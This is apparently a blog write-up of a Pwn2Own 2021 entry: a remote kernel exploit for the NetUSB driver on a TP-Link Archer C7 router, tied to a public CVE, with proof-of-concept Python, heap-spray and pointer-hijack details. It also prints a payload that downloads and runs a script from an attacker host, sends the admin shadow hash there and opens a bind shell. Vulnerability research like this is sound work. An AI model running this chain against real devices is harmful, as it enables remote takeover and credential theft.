  • Pavlína Kopecká
  • Samuel Sidor
  • Vladimir Martyanov
  • Vladimír Žalud
Data analysts
  • Pavol Plaskoň
Communications
  • Dave Matthews
  • Stefanie Smith

The post Avast Q1/2022 Threat Report appeared first on Avast Threat Labs.

Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly was pretty horrified with what I found and wrote Longue vue 🔭 over the weekend which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate to the contest and after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, the hardware was easy and cheap to get so it felt like the right choice.

router targets

At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it, you just want one to be able to figure out what are the interesting attack surfaces to look at.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.

Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two line of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low hanging fruits and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended to order a FT232 USB cable and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and started to get to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

Enumerating the attack surfaces

It was time for me to figure out which areas I should try to focus my time on. I did a bunch of reading as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new grounds to lower the chance of entering the competition with a duplicate and also maximize my chances at finding something that would allow me to enter the competition. Before thinking about duplicates, I need a bug.

I started to do some very basic attack surface enumeration: processes running, iptable rules, sockets listening, crontable, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq

At first sight, the following processes looked interesting: - the uhttpd HTTP server, - the third-party dnsmasq service that potentially could be unpatched to upstream bugs (unlikely?), - the tdpServer which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.

One another thing I burned time on is to go through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to figure out if dnsmasq was properly patched to recent vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed different 😔. Dead-end.

NetUSB shenanigans

There were two strange lines in the netstat output from above that did stand out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -

Why is there no process name associated with those sockets uh 🤔? Well, it turns out that after googling and looking around those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild stuff is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities were discovered and exploited in the past and that indeed TP-Link was not the only router to ship this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper in the code. After enumerating a lot of places where the attacker inputs is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
  if(result) {
    v64[0] = _bswapw(v64[0]); <----------------------- attacker controlled
    Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0); <---- overflow
    if(Payload_1) {
      // ...
      if(SoftwareBus_fillBuf(SbusConnection, Payload_1 + 2, v64[0]))

I first thought this was going to lead to a wild overflow type of bug because the code would try to read a very large number of bytes into this buffer but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefuly, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
  if(SbusConnection)
    if(Buffer) {
      if(BufferLen) {
        while (1) {
          GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
          if ( GetLen <= 0 )
            break;
          BufferLen -= GetLen;
          Buffer = (char *)Buffer + GetLen;
          if ( !BufferLen )
            return 1;
        }
        kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
        return 0;
      }
      else {
        return 1;
      }
    } else {
      // ...
      return 0;
    }
  }
  else {
    // ...
    return 0;
  }
}

KTCP_get is basically a wrapper around ks_recv, which basically means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data I wanted. If you are interested to learn on how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py or you can also read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:

from Crypto.Cipher import AES
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
  # Version
  s.send(b'\x56\x04')
  # Send random data
  s.send(aes_ctx.encrypt(b'a' * 16))
  _ = s.recv(16)
  # Receive & send back the random numbers.
  challenge = s.recv(16)
  s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
  length = len(name)
  assert length - 1 < 63
  s.send(le32(length))
  b = name
  if type(name) == str:
    b = bytes(name, 'ascii')
  s.send(b)

def create_connection(target, port, name):
  second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target, port))
  aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
  send_handshake(s, aes_ctx)
  send_bus_name(s, name)
  return s, aes_ctx

def main():
  parser = argparse.ArgumentParser('Zenith PoC2')
  parser.add_argument('--target', required = True)
  args = parser.parse_args()
  s, _ = create_connection(args.target, netusb_port, 'PoC2')
  s.send(le8(0xff))
  s.send(le8(0x21))
  s.send(le32(0xff_ff_ff_ff))
  p = b'\xab' * (0x1_000 * 100)
  s.send(p)

Another interesting detail was that the allocation function is mallocPageBuf which I didn't know about. After looking into its implementation, it eventually calls into _get_free_pages which is part of the Linux kernel. _get_free_pages allocates 2**n number of pages, and is implemented using what is called, a Binary Buddy Allocator. I wasn't familiar with that kind of allocator, and ended-up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug would give me full control over the content and I was able to overflow the pages with pretty much as much data as I wanted. The only thing that I couldn't fully control was the size passed to the allocation. The only limitation was that I could only trigger a mallocPageBuf call with a size in the following interval: [0, 8] because of the integer overflow. mallocPageBuf aligns the passed size to the next power of two, and calculates the order (n in 2**n) to invoke _get_free_pages.

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.

int kc_printf(const char *a1, ...) {
  // ...
  v1 = vsprintf(v6, a1);
  v2 = v1 < 257;
  v3 = v1 + 1;
  if(!v2) {
    v6[256] = 0;
    v3 = 257;
  }
  v5 = v3;
  kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
  return printk("<1>%s", v6);
}

Pretty funny right?

Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob so this lack of introspections wasn't going to work. What are my options?

Well, as I mentioned earlier TP-Link is maintaining a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement with my current situation. I would be able to hook-up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering but it was in fact not it. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that was booting just fine, and decided that I would try to merge both of the kernel configurations until I end up with a bootable image that has a configuration as close as possible from the kernel running on the device. Same kernel version, allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, the driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any types used by this structure can do the same which means that looking at the main definition of a structure is not enough.

struct net_device {
// ...
#ifdef CONFIG_WIRELESS_EXT
  /* List of functions to handle Wireless Extensions (instead of ioctl).
   * See <net/iw_handler.h> for details. Jean II */
  const struct iw_handler_def * wireless_handlers;
  /* Instance data managed by the core of Wireless Extensions. */
  struct iw_public_data * wireless_data;
#endif
// ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
  struct vlan_info __rcu  *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
  struct dsa_switch_tree  *dsa_ptr; /* dsa specific data */
#endif
// ...
#ifdef CONFIG_SYSFS
  struct kset   *queues_kset;
#endif

#ifdef CONFIG_RPS
  struct netdev_rx_queue  *_rx;

  /* Number of RX queues allocated at register_netdev() time */
  unsigned int    num_rx_queues;

  /* Number of RX queues currently active in device */
  unsigned int    real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
  /* CPU reverse-mapping for RX completion interrupts, indexed
   * by RX queue number.  Assigned by driver.  This must only be
   * set if the ndo_rx_flow_steer operation is defined. */
  struct cpu_rmap   *rx_cpu_rmap;
#endif
#endif
//...
};

Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash and try to look at the code / structures involved and see if a kernel configuration option would impact the layout of a relevant structure. From there, I could see the difference between the kernel configuration for my bootable QEMU image and the kernel I had built from the GPL and see where were mismatches. If there was one, I could simply turn the option on or off, recompile and hope that it doesn't make the kernel unbootable under QEMU.

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

over@panther:~/pwn2own$ qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s -hda debian_wheezy_mips_standard.qcow2 -net nic,netdev=network0 -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337
[...]
root@debian-mips:~# ./start.sh
[   89.092000] new slab @ 86964000
[   89.108000] kcg 333 :GPL NetUSB up!
[   89.240000] NetUSB: module license 'Proprietary' taints kernel.
[   89.240000] Disabling lock debugging due to kernel taint
[   89.268000] kc   90 : run_telnetDBGDServer start
[   89.272000] kc  227 : init_DebugD end
[   89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00
[   89.272000] INFO17FA: 7437: Archer C7    :Archer C7
[   89.272000] INFO17FB:  AUTH ISOC
[   89.272000] INFO17FC:  filterAudio
[   89.272000] usbcore: registered new interface driver KC NetUSB General Driver
[   89.276000] INFO0145:  init proc : PAGE_SIZE 4096
[   89.280000] INFO16EC:  infomap 869c6e38
[   89.280000] INFO16EF:  sleep to wait eth0 to wake up
[   89.280000] INFO15BF: tcpConnector() started... : eth0
NetUSB 160207 0 - Live 0x869c0000 (P)
GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000
root@debian-mips:~# [   92.308000] INFO1572: Bind to eth0

For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones): - I used debootstrap to easily be able to install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as cross-compiling the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM and chroot in those folders and SHOULD be able to reproduce what I described. Or at least, be very close from reproducing. - I cross compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz. - You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.

Enters Zenith

Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.

I started to read a lot of code, documentation and papers about Linux kernel exploitation. The linux kernel version was old enough that it didn't have a bunch of more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets Andrey Konovalov describes in details an attack that looked like could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes) which would force blocks from the higher order to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000 which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could be now used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying things I hadn't realized when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  switch (OpcodeMasked) {
    case 0x50:
        if (SoftwareBus_fillBuf(SbusConnection, ReceiveBuffer, 4)) {
          ReceivedSize = _bswapw(*(uint32_t*)ReceiveBuffer);
            AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
            if (!AllocatedBuffer) {
                return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
            }
  // ...
            if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))

Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error I started to notice that if I was taking a small pause after the allocation of the buffer but before overflowing it, an interesting structure would be magically allocated fairly close from my buffer. To this day, I haven't fully debugged where it exactly came from but as this was my only lead I went along with it.

The target kernel doesn't have ASLR and doesn't have NX, so my exploit is able to hardcode addresses and execute the heap directly which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB large allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d
addr_payload = 0x83c00000 + 0x10

# ...

def main(stdscr):
  # ...
  # Let's get to business.
  _3mb = 3 * 1_024 * 1_024
  payload_sprayer = SprayerThread(args.target, 'payload sprayer')
  payload_sprayer.set_length(_3mb)
  payload_sprayer.set_spray_content(payload)
  payload_sprayer.start()
  leaker.wait_for_one()
  sprayers.append(payload_sprayer)
  log(f'Payload placed @ {hex(addr_payload)}')
  y += 1

My final exploit, Zenith, overflows an adjacent wait_queue_head_t.head.next structure that is placed by the socket stack of the Linux kernel with the address of a crafted wait_queue_entry_t under my control (Trasher class in the exploit code). This is the definition of the structure:

struct wait_queue_head {
  spinlock_t    lock;
  struct list_head  head;
};

struct wait_queue_entry {
  unsigned int    flags;
  void      *private;
  wait_queue_func_t func;
  struct list_head  entry;
};

This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
      int nr_exclusive, int wake_flags, void *key)
{
  wait_queue_t *curr, *next;

  list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
    unsigned flags = curr->flags;

    if (curr->func(curr, mode, wake_flags, key) &&
        (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
      break;
  }
}

This is what it looks like in GDB once q->head.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00

(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff

(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)

Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
3375    kernel/sched/core.c: No such file or directory.

(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,
    prev = 0xbaadc0d1}}

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
    nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
    dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34

Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
      .word arg1
      .word arg2
envp: .word 0

The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?$(grep -E admin: /etc/shadow)
lua -e 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  while true do
    local r,x=c:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));c:send(b);
  end;c:close();f:close();'

The exploit also uses the debug interface that I mentioned earlier as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class).

OK at that point, it works in QEMU... which is pretty wild. Never thought it would. Ever. What's also wild is that I am still in time for the Pwn2Own registration, so maybe this is also possible 🤔. Reliability wise, it worked well enough on the QEMU environment: about 3 times about 5 I would say. Good enough.

I started to port over the exploit to the real device and to my surprise it also worked there as well. The reliability was poorer but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel I was left with dmesg outputs to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable but hey I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:

Beautiful. Time to register!

Entering the contest

As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI stuff would throw our exploits on the environment they had set-up.

At that point we had two exploits and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link pushed an update for the router 😳. I thought Damn. I was at work when I saw the news and was stressed about the bug getting killed. Or worried that the update could have changed anything that my exploit was relying on: the kernel, etc. I finished my day at work and pulled down the firmware from the website. I checked the release notes while the archive was downloading but it didn't have any hints suggesting that they had updated either NetUSB or the kernel which was.. good. I extracted the file off the firmware file with binwalk and quickly verified the NetUSB.ko file. I grabbed a hash and ... it was the same. Wow. What a relief 😮‍💨.

When the time of demonstrating my exploit came, it unfortunately didn't land in the three attempts which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think that I'd be able to compete and so I took this experience as a win on its own.

On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆.

Wrapping up

Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it:

  • Attacking the kernel might be cool, but it is an absolute pain to debug / set-up an environment. I probably would not go that route again if I was doing it again.
  • Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive.
  • Getting a root shell on the device ASAP is a good idea. I initially tried to find a post auth vulnerability statically to get a root shell but that was wasted time.
  • The Ghidra disassembler decompiles MIPS32 code pretty well. It wasn't perfect but a net positive.
  • I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port. I wasn't in it for the money but maybe it would be good for me to do a better job at taking a look at more than a target instead of directly diving deep into one exclusively.
  • The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
  • Higher payouts don't necessarily mean a harder target.

You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references:

I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽.

Oh, and come hangout on Diary of reverse-engineering's Discord server with us!

❌
❌